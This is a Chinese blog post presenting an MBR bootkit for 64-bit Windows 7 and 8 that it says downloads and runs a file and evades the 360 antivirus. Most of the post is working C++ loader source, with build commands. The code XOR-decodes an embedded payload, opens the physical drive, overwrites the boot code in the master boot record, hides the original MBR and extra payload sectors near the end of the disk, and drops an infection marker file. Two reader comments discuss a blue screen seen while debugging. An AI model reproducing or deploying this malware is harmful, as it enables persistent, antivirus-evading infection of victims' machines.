1. 首页
  2. 日记

感染磁盘MBR的rootkit测试视频 下载并运行文件

感染MBR磁盘引导的rootkit
下载并运行文件。
支持win7 x64和win8 x64。
无视360safe。
遇到这种程度的恶意软件也别反抗了。

编译方法:
“F:\JWasm211bw\jwasm.exe” “F:\MBRhack\res\win7_x64.asm”
“F:\JWasm211bw\doslnk.exe” “F:\MBRhack\res\win7_x64.obj” /tiny

// MBR rootkit 2015 
// by Eric21.com

#include <windows.h>
#include <tchar.h>
#include <winioctl.h>
#include "targetver.h"
#include "res/win7_x64.h"
////////////////////////////////////////////
int _tmain()
{
	HANDLE hMark;//文件句柄
	hMark = CreateFile("C:\\MBR.bin", GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
	////////////////////////////////////////////////
	if (hMark == INVALID_HANDLE_VALUE)
	{
		for (int i = 0; i < sizeof(w764Array); i++)
		{
			//szArray[i] = ~ szArray[i]; // 取反 ~
			w764Array[i] = w764Array[i] ^ 123; // 异或 ^
		}
		DWORD dwSize;
		dwSize = sizeof(w764Array);
		LPBYTE lpBuffer = new BYTE[dwSize];
		memcpy(lpBuffer, w764Array, dwSize);
		HANDLE hPhysicalDrive = CreateFile("\\\\.\\PHYSICALDRIVE0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
			OPEN_EXISTING, 0, NULL);
		if (hPhysicalDrive == INVALID_HANDLE_VALUE)
		{
			//OutputDebugString("Open Drive0 Failed!");
			delete lpBuffer;
			return 0;
		}
		BYTE BootSector[512];//原始MBR
		DWORD NumberOfBytesRead;
		if (SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN) == INVALID_SET_FILE_POINTER ||
			!ReadFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL))
		{
			//OutputDebugString("读取原始MBR失败!");
			delete lpBuffer;
			CloseHandle(hPhysicalDrive);
			return 0;
		}
		BYTE backBootSector[512];
		memcpy(&backBootSector, &BootSector, 512);
		memcpy(&backBootSector, lpBuffer, 446);


		SetFilePointer(hPhysicalDrive, 0, 0, FILE_BEGIN);//读文件的时候会移动指针,所以要设置下
		WriteFile(hPhysicalDrive, backBootSector, 512, &NumberOfBytesRead, NULL);//MBR感染446

		DISK_GEOMETRY_EX pdg = { 0 };
		DWORD junk = 0;                     // discard results
		DeviceIoControl(hPhysicalDrive,                       // device to be queried                            
			IOCTL_DISK_GET_DRIVE_GEOMETRY_EX, // operation to perform                            
			NULL, 0,                       // no input buffer                            
			&pdg, sizeof(pdg),            // output buffer                            
			&junk,                         // # bytes returned                            
			(LPOVERLAPPED)NULL);          // synchronous I/O

		//备份MBR
		LARGE_INTEGER PositionFileTable;
		PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512;
		PositionFileTable.QuadPart -= 10;
		PositionFileTable.QuadPart *= 512;
		NumberOfBytesRead = 0;
		if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER ||
			!WriteFile(hPhysicalDrive, &BootSector, 512, &NumberOfBytesRead, NULL))
		{
			//OutputDebugString("备份原始MBR失败");
			delete lpBuffer;
			CloseHandle(hPhysicalDrive);
			return 0;
		}

		//写入MBR其他数据
		PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512;
		PositionFileTable.QuadPart -= 9;
		PositionFileTable.QuadPart *= 512;
		if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER ||
			!WriteFile(hPhysicalDrive, lpBuffer + 512, ((dwSize - 512) / 512 + 1) * 512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍
		{
			//OutputDebugString("Write Other Failed!");
			delete lpBuffer;
			CloseHandle(hPhysicalDrive);
			return 0;
		}

		//备份MBR loader 
		PositionFileTable.QuadPart = pdg.DiskSize.QuadPart / 512;
		PositionFileTable.QuadPart -= 11;
		PositionFileTable.QuadPart *= 512;
		if (!SetFilePointerEx(hPhysicalDrive, PositionFileTable, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER ||
			!WriteFile(hPhysicalDrive, backBootSector, 512, &NumberOfBytesRead, NULL))//WriteFile第三个参数必须是512的整数倍
		{
			//OutputDebugString("Write Other Failed!");
			delete lpBuffer;
			CloseHandle(hPhysicalDrive);
			return 0;
		}


		delete lpBuffer;
		CloseHandle(hPhysicalDrive);
		/////////////////////////////////
		//创建修改标识
		char text[] = "MBR hacked";
		DWORD dwBytesWritten = 0;
		HANDLE hFile;//文件句柄
		hFile = CreateFile(
			"C:\\MBR.bin",//创建或打开的文件或设备的名称(这里是txt文件)。
			GENERIC_WRITE,// 文件访问权限,写
			0,//共享模式,这里设置0防止其他进程打开文件或设备
			NULL,//SECURITY_ATTRIBUTES结构,安全描述,这里NULL代表默认安全级别
			CREATE_ALWAYS,//对于存在或不存在的设置执行的操作,这里是始终创建
			FILE_ATTRIBUTE_NORMAL,//设置文件的属性,里面有高速缓存的选项
			NULL);
		if (hFile != INVALID_HANDLE_VALUE)
		{
			WriteFile(hFile, text, strlen(text), &dwBytesWritten, NULL);
		}
		CloseHandle(hFile);
	}
	CloseHandle(hMark);

	return 1;
}
////////////////////////////////////////////

http://bbs.pediy.com/showthread.php?t=204938 原作者:lxsgbin
https://github.com/eric21/MBRhack



测试视频,建议全屏观看。

评分 0, 满分 5 星
0
0
看完收藏一下,下次也能找得到
  • 版权声明:本文基于《知识共享署名-相同方式共享 3.0 中国大陆许可协议》发布,转载请遵循本协议
  • 文章链接:http://www.eric21.com/2015/10/25/414 [复制] (转载时请注明本文出处及文章链接)
  • 本文无相关文章
上一篇:
:下一篇

2 条评论

gravatar

  1. 我最近在win7_X64上测试这个东西,用的是bochs调试,发现在读取gs:0x188时,也就是_KPCR–>_KPRCB–>_KTHREAD结构体时蓝屏,求大神指教。

    #-49楼
    1. @光头加暴击 我不是大神啊,我这是从看雪看来的,做了个loader,出了个演示视频而已。你还是去看雪请教原作者吧。

00:00/00:00